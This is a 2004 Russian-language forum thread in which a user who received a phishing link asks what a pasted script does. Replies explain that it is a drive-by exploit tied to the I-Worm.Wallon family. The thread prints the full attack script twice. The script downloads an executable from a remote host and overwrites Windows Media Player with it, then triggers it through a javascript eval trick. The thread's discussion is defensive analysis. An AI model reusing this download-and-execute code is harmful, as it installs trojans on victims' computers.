Nadgil Опубликовано 31 мая, 2004 Жалоба Поделиться Опубликовано 31 мая, 2004 (изменено) Всем привет. Тут на днях моей подруге пришла ссылка с поролем админа на один сайт - ну я конечно же попался и решил зайти. Слава богу защита у меня не плохая и антивирь и фаервол Сайт хотел через wmplayer что-то загрузить. Я страничку скопировал. ниже представлен код - кода самой страницы там нет, я его выбросил (навиг он нужен) - тут сам скрипт. Антивирусник ругается, что вирус, когда сохраняешь его как страничку. var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://216.75.230.40/cgi-bin//wmplayer.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); s.SaveToFile("C:\\Program Files\\Windows Media Player\\mplayer2.exe",2); location.href = "mms://";</TEXTAREA><script language=javascript> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media"); } window.open("http://%77%77%77%35%2E%64%6F%6D%61%69%6E%64%6C%78%2E%63%6F%6D%2F%72%75%70%6F%72%74%2F%65%72%72%6F%72%2E%70%68%70","_media"); setTimeout("doit()", 5000); </SCRIPT> Подскажите, что делает этот код. Заранее спасибо. Изменено 31 мая, 2004 пользователем Nadgil Ссылка на комментарий Поделиться на другие сайты Поделиться
SIMC Опубликовано 31 мая, 2004 Жалоба Поделиться Опубликовано 31 мая, 2004 Ну, глянь по названию, которое выдает антивирус, в поисковике. Или он у тебя просто грит что: !Вирус!, !Вирус!, !Атеншн! У тебя Дохтур, насколько я помню? Он же выдает названия вирусов?! Ссылка на комментарий Поделиться на другие сайты Поделиться
Premium Опубликовано 31 мая, 2004 Жалоба Поделиться Опубликовано 31 мая, 2004 Подскажите, что делает этот код Да в общем то это и делает, сам сказал: Сайт хотел через wmplayer что-то загрузить Этот скрипт загружает тебе на комп екзешник трояна. Сохраняет его в качестве медиа-плейера, то есть файлы твоего плейера на компе будут перезаписаны и при попытке запустить Windows Media Player ты запустишь трояна. Но на тебя надежды мало, вдруг ты другим плейером пользуешься, не виндовым Поэтому в конце скрипта еще и добавляется команда браузеру запустить мультимедийный файл, типа музычку проиграть. Но поскольку вместо екзешника плейера у тебя уже теоретически стоит екзешник трояна, то он и будет запущен. Ссылка на комментарий Поделиться на другие сайты Поделиться
Nadgil Опубликовано 31 мая, 2004 Автор Жалоба Поделиться Опубликовано 31 мая, 2004 Скорее всего он его не успел загрузить!!! Но вроде плеер в нет не стучится. и вообщего ничего само в нет не стучится. Ссылка на комментарий Поделиться на другие сайты Поделиться
demer Опубликовано 31 мая, 2004 Жалоба Поделиться Опубликовано 31 мая, 2004 Хех, блин во чё уже хацкеры придумали... Ну впринципе способ хороший, но не оч. достойный =) Ссылка на комментарий Поделиться на другие сайты Поделиться
Nadgil Опубликовано 31 мая, 2004 Автор Жалоба Поделиться Опубликовано 31 мая, 2004 мне повезло у меня винда была на другом диске ;) Ссылка на комментарий Поделиться на другие сайты Поделиться
SIMC Опубликовано 1 июня, 2004 Жалоба Поделиться Опубликовано 1 июня, 2004 Nadgil Меня интересует вопрос - а по какому именно пути твой антивирь обнаружил этот скрипт. То есть, если путь скрипта прописан как "C:\\Program Files\\Windows Media Player\\wmplayer.exe", а такого пути на машине нет, то куда тогда валится вирус? Хоть примерно помнишь? Вот я еще нашел похожий пример на www.nepomnygde.com: <textarea id="code" style="display:none;">var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://site/proga.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("c:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://"; </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:java script:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); </script> Пост в оригинале называецця - " Выложу старый free эксплойт но рабочий 8) wmplayer". Фактически получается что вписав свои данные в етот скрипт злоумышленник может загрузить троя в комп юзверю? Ужас какой =) А ваще, эта хрень именуется - I-Worm.Wallon.a Ссылка на комментарий Поделиться на другие сайты Поделиться
Premium Опубликовано 1 июня, 2004 Жалоба Поделиться Опубликовано 1 июня, 2004 если путь скрипта прописан как "C:\\Program Files\\Windows Media Player\\wmplayer.exe", а такого пути на машине нет, то куда тогда валится вирус?Никуда не валится, просто ошибку выдаст и все.А ваще, эта хрень именуется - I-Worm.Wallon.a Нет, это вот что http://www.viruslist.com/viruslist.html?id=144031644 Ссылка на комментарий Поделиться на другие сайты Поделиться
SIMC Опубликовано 2 июня, 2004 Жалоба Поделиться Опубликовано 2 июня, 2004 А ваще, эта хрень именуется - I-Worm.Wallon.a Нет, это вот что http://www.viruslist.com/viruslist.html?id=144031644Premium, я прочел тут: тут, что: "Лаборатория Касперского" сообщает об эпидемии обнаруженного в прошлый четверг, 6 мая, интернет-червя I-Worm.Wallon.a. Червь распространяется по электронной почте в виде ссылки на зараженный веб-сайт. Письмо, отправленное с зараженного I-Worm.Wallon.a компьютера (адреса отправителя и получателя, а также домен получателя затерты)... При обращении по данной ссылке происходит использование уязвимости в Internet Explorer в результате чего в системе исполняется скриптовый "троянец". Данная троянская программа извлекает из себя и перезаписывает файл "wmplayer.exe" (размер около 36 КБ, упакован ASPack) своим файлом, который является троянской программой класса Downloader. Данный файл загружает из интернета основной файл червя и устанавливает его в корневой каталог диска C: с именем "alpha.exe". "Троянец" изменяет стартовую страницу Internet Explorer на сайт www.google.com.super-fast-search.apsua.com. Также червь создает собственный toolbar в Internet Explorer. Червь рассылает письмо со ссылкой по всем адресам электронной почты, найденным в адресной книге MS Outlook на зараженной машине. Так что, думается мне, что это одни и теже яйца, только вид с разных сторон. Разве нет? Смысл то один! Или как, если какой-нить юзверь щас возьмет этот код и отшлефует его под свои нужды , то он уже смело может обзывать виря своим именем и Каспер & Co зарегистрируют его как нового червя?? Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Для публикации сообщений создайте учётную запись или авторизуйтесь
Вы должны быть пользователем, чтобы оставить комментарий
Создать учетную запись
Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!
Регистрация нового пользователяВойти
Уже есть аккаунт? Войти в систему.
Войти